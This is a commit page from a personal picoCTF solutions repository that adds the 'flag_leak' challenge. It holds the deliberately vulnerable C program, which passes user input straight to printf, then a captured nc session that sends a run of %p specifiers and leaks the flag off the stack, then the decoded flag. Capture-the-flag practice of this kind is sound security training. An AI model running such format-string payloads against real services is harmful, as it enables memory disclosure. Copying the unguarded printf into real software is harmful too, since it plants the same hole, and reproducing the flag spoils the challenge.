oysteikt/picoctf
oysteikt
/
picoctf
0
0
Fork 0
Code Issues Pull Requests Activity

pwn/flag_leak

This commit is contained in:
Oystein Kristoffer Tveit 2024-09-03 23:03:46 +02:00
parent f841e31a80
commit f4feacef1d
Signed by: oysteikt
GPG Key ID: 9F2F7D8250F35146
4 changed files with 54 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
pwn/flag_leak/flag.txt Normal file
View File

@ -0,0 +1,5 @@
# 0x6f6369700x7b4654430x6b34334c0x5f676e310x67346c460x6666305f0x3474535f0x395f6b630x326539390x7d343238
#
# https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Simple%20string','string':'.'%7D,'%20',true,false,true,false)Swap_endianness('Hex',4,true)From_Hex('Auto')&input=MHg2ZjYzNjk3MDB4N2I0NjU0NDMweDZiMzQzMzRjMHg1ZjY3NmUzMTB4NjczNDZjNDYweDY2NjYzMDVmMHgzNDc0NTM1ZjB4Mzk1ZjZiNjMweDMyNjUzOTM5MHg3ZDM0MzIzOA
picoCTF{L34k1ng_Fl4g_0ff_St4ck_999e2824}

3
pwn/flag_leak/output.txt Normal file
View File

@ -0,0 +1,3 @@
$ nc saturn.picoctf.net 49378 <<<"%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p"
Tell me a story and then I'll tell you one >> Here's a story -
0xffc3b7100xffc3b7300x80493460x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x2570250x6f6369700x7b4654430x6b34334c0x5f676e310x67346c460x6666305f0x3474535f0x395f6b630x326539390x7d3432380xfbad20000x33f1c800(nil)0xea7119900x804c0000x8049410(nil)0x804c0000xffc3b7f80x80494180x20xffc3b8a40xffc3b8b0(nil)0xffc3b810(nil)(nil)0xea507ed5

BIN
pwn/flag_leak/vuln Executable file
View File

Binary file not shown.

46
pwn/flag_leak/vuln.c Normal file
View File

@ -0,0 +1,46 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <wchar.h>
#include <locale.h>
#define BUFSIZE 64
#define FLAGSIZE 64
void readflag(char* buf, size_t len) {
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(buf,len,f); // size bound read
}
void vuln(){
char flag[BUFSIZE];
char story[128];
readflag(flag, FLAGSIZE);
printf("Tell me a story and then I'll tell you one >> ");
scanf("%127s", story);
printf("Here's a story - \n");
printf(story);
printf("\n");
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
vuln();
return 0;
}